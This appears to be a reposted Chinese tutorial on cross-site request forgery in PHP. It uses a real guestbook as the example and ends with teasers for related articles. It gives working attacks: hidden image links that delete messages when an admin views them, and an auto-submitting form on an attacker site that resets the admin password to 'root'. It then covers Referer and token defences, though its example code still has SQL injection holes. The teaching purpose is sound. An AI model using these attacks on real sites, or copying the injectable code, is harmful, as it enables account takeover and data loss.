PHP漏洞全解(六)-跨网站请求伪造

本文主要介绍针对PHP网站的跨网站请求伪造。在CSRF所有攻击方式中包含攻击者伪造一个看起来是其他用户发起的 HTTP 请求,事实上,跟踪一个用户发送的 HTTP 请求才是攻击者的目的。

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请 求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法 权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。

例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接

,那么如果目标用户不小心访问以后,购买的数量就成了1000个

实例

随缘网络PHP留言板V1.0

任意删除留言

//delbook.php 此页面用于删除留言

  1. include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
  2. include_once("../conn.php");
  3. $del=$_GET["del"];
  4. $id=$_GET["id"];
  5. if ($del=="data")
  6. {
  7. $ID_Dele= implode(",",$_POST[‘adid‘]);
  8. $sql="delete from book where id in (".$ID_Dele.")";
  9. mysql_query($sql);
  10. }
  11. else
  12. {
  13. $sql="delete from book where id=".$id; //传递要删除的留言ID
  14. mysql_query($sql);
  15. }
  16. mysql_close($conn);
  17. echo "";
  18. echo "alert(‘删除成功!’);";
  19. echo " location=’book.php’;";
  20. echo "";
  21. ?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言

利用方法:

我们使用普通用户留言(源代码方式),内容为

  1. "delbook.php?id=2" />
  2. "delbook.php?id=3" />
  3. "delbook.php?id=4" />
  4. "delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了

现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。

攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了

修改管理员密码

  1. //pass.php
  2. if($_GET["act"])
  3. {
  4. $username=$_POST["username"];
  5. $sh=$_POST["sh"];
  6. $gg=$_POST["gg"];
  7. $title=$_POST["title"];
  8. $copyright=$_POST["copyright"]."
    设计制作:厦门随缘网络科技";
  9. $password=md5($_POST["password"]);
  10. if(emptyempty($_POST["password"]))
  11. {
  12. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
  13. }
  14. else
  15. {
  16. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
  17. }
  18. mysql_query($sql);
  19. mysql_close($conn);
  20. echo "";
  21. echo "alert(‘修改成功!’);";
  22. echo " location=’pass.php’;";
  23. echo "";
  24. }

这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:

  1. <body>
  2. <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
  3. <input type="radio" value="1" name="sh">
  4. <input type="radio" name="sh" checked value="0">
  5. <input type="text" name="username" value="root">
  6. <input type="password" name="password" value="root">
  7. <input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" >
  8. <textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!textarea>
  9. <textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名textarea>
  10. form>
  11. body>

存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法

防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:

1、检查网页的来源

2、检查内置的隐藏变量

3、使用POST,不要使用GET

检查网页来源

在//pass.php头部加入以下红色字体代码,验证数据提交

  1. if($_GET["act"])
  2. {
  3. if(isset($_SERVER["HTTP_REFERER"]))
  4. {
  5. $serverhost = $_SERVER["SERVER_NAME"];
  6. $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]);
  7. $strdomain = explode("/",$strurl);
  8. $sourcehost = $strdomain[0];
  9. if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
  10. {
  11. unset($_POST);
  12. echo "";
  13. echo "alert(‘数据来源异常!’);";
  14. echo " location=’index.php’;";
  15. echo "";
  16. }
  17. }
  18. $username=$_POST["username"];
  19. $sh=$_POST["sh"];
  20. $gg=$_POST["gg"];
  21. $title=$_POST["title"];
  22. $copyright=$_POST["copyright"]."
    设计制作:厦门随缘网络科技";
  23. $password=md5($_POST["password"]);
  24. if(emptyempty($_POST["password"]))
  25. {
  26. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
  27. }
  28. else
  29. {
  30. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
  31. }
  32. mysql_query($sql);
  33. mysql_close($conn);
  34. echo "";
  35. echo "alert(‘修改成功!’);";
  36. echo " location=’pass.php’;";
  37. echo "";
  38. }

检查内置隐藏变量

我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用

  1. php
  2. include_once("dlyz.php");
  3. include_once("../conn.php");
  4. if($_GET["act"])
  5. {
  6. if (!isset($_SESSION["post_id"]))
  7. {
  8. // 生成唯一的ID,并使用MD5来加密
  9. $post_id = md5(uniqid(rand(), true));
  10. // 创建Session变量
  11. $_SESSION["post_id"] = $post_id;
  12. }
  13. // 检查是否相等
  14. if (isset($_SESSION["post_id"]))
  15. {
  16. // 不相等
  17. if ($_SESSION["post_id"] != $_POST["post_id"])
  18. {
  19. // 清除POST变量
  20. unset($_POST);
  21. echo "<script language=’javascript’>";
  22. echo "alert(‘数据来源异常!’);";
  23. echo " location=’index.php’;";
  24. echo "script>";
  25. }
  26. }
  27. ……
  28. <input type="reset" name="Submit2" value="重 置">
  29. <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>">
  30. td>tr>
  31. table>
  32. form>
  33. php
  34. }
  35. mysql_close($conn);
  36. ?>
  37. body>
  38. html>

使用POST,不要使用GET

传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

PHP漏洞全解(六)-跨网站请求伪造,布布扣,bubuko.com

时间: 07-13

PHP漏洞全解(六)-跨网站请求伪造的相关文章

PHP漏洞全解(一)-PHP网站的安全性问题

本文主要介绍针对PHP网站常见的攻击方式,包括常见的sql注入,跨站等攻击类型.同时介绍了PHP的几个重要参数设置.后面的系列文章将站在攻击者的角度,为你揭开PHP安全问题,同时提供相应应对方案. 针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Command Injection) 2.eval注入(Eval Injection) 3.客户端脚本攻击(Script Insertion) 4.跨网站脚本攻击(Cross Site Scripting, XSS) 5.SQL注入攻击(SQL

PHP漏洞全解

针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Command Injection) 2.eval注入(Eval Injection) 3.客户端脚本攻击(Script Insertion) 4.跨网站脚本攻击(Cross Site Scripting, XSS) 5.SQL注入攻击(SQL injection) 6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7.Session 会话劫持(Session Hijacking) 8.Ses

PHP漏洞全解(四)-xss跨站脚本攻击

本文主要介绍针对PHP网站的xss跨站脚本攻击.跨站脚本攻击是通过在网页中加入恶意代码,当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息 的方式诱使管理员浏览,从而获得管理员权限,控制整个网站.攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇 请求.修改口令和下载非法的内容等请求. XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS 跨站脚本主要

深入解析跨站请求伪造漏洞:实例讲解

本文的上篇中,我们着重介绍了跨站请求伪造的原理,并指出现有的安全模型并不能真正防御这种攻击.在下篇中,我们将向读者介绍在一些大型站点上发现的几个严重的CSRF漏洞,攻击者利用这些漏洞不仅能够采集用户的电子邮件地址,侵犯用户隐私并操控用户帐户.如果金融站点出现了跨站请求伪造漏洞的话,这些漏洞甚至允许攻击者从用户的银行帐户中划走资金.为了全面的防御CSRF攻击,建议对服务器端进行改造.此外,本文还会介绍服务器端解决方案应具备的特征,如果缺乏这些特性,就会导致CSRF保护措施不必要地妨碍典型的web浏

PHP漏洞全解(七)-Session劫持

本文主要介绍针对PHP网站Session劫持.session劫持是一种比较复杂的攻击方法.大部分互联网上的电脑多存在被攻击的危险.这是一种劫持tcp协议的方法,所以几乎所有的局域网,都存在被劫持可能. 服务端和客户端之间是通过session(会话)来连接沟通.当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session.每个用 户的session都是独立的,并且由服务器来维护.每个用户的session是由一个独特的字符串来识别,成为session id.用户发出请求时,所发送的htt

深入解析跨站请求伪造漏洞:原理剖析

当存心不良的Web站点导致用户的浏览器在可信的站点上进行非意愿的活动时,我们就说发生了跨站请求伪造(CSRF)攻击.这些攻击被誉为基于Web的漏洞中的“沉睡的巨人”,因为互联网上的许多站点对此毫无防备,同时还因为这类攻击一直为web开发和安全社区所忽视. 一.概述 当存心不良的Web站点导致用户的浏览器在可信的站点上进行非意愿的活动时,我们就说发生了跨站请求伪造(CSRF)攻击.跨站请求伪造攻击亦称跨站引用伪造(XSRF),会话叠置和混淆代理人攻击.我们之所以使用术语CSRF,是因为它是描述这类

PHP漏洞全解(八)-HTTP响应拆分

本文主要介绍针对PHP网站HTTP响应拆分,站在攻击者的角度,为你演示HTTP响应拆分. HTTP请求的格式 1)请求信息:例如“Get /index.php HTTP/1.1”,请求index.php文件 2)表头:例如“Host: localhost”,表示服务器地址 3)空白行 4)信息正文 “请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不可以有其他空格符. 下面例子发送HTTP请求给服务器www.yhsafe.com GET /index.php HT

PHP漏洞全解(三)-客户端脚本植入

本文主要介绍针对PHP网站的客户端脚本植入攻击方式.所谓客户端脚本植入攻击,是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,黑客所植入的脚本就会被执行,进而开始攻击. 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击. 可以被用作脚本植入的HTML标签一般包括以下几种: 1.<script>标签标记的javascript和vb

PHP漏洞全解(二)-命令注入攻击

本文主要介绍针对PHP网站常见的攻击方式中的命令攻击.Command Injection,即命令注入攻击,是指这样一种攻击手段,黑客通过把HTML代码输入一个输入机制(例如缺乏有效验证限制的表格域)来改变网页的动态 生成的内容.使用系统命令是一项危险的操作,尤其在你试图使用远程数据来构造要执行的命令时更是如此.如果使用了被污染数据,命令注入漏洞就产生了. 命令注入攻击 PHP中可以使用下列5个函数来执行外部的应用程序或函数 system.exec.passthru.shell_exec.“(与s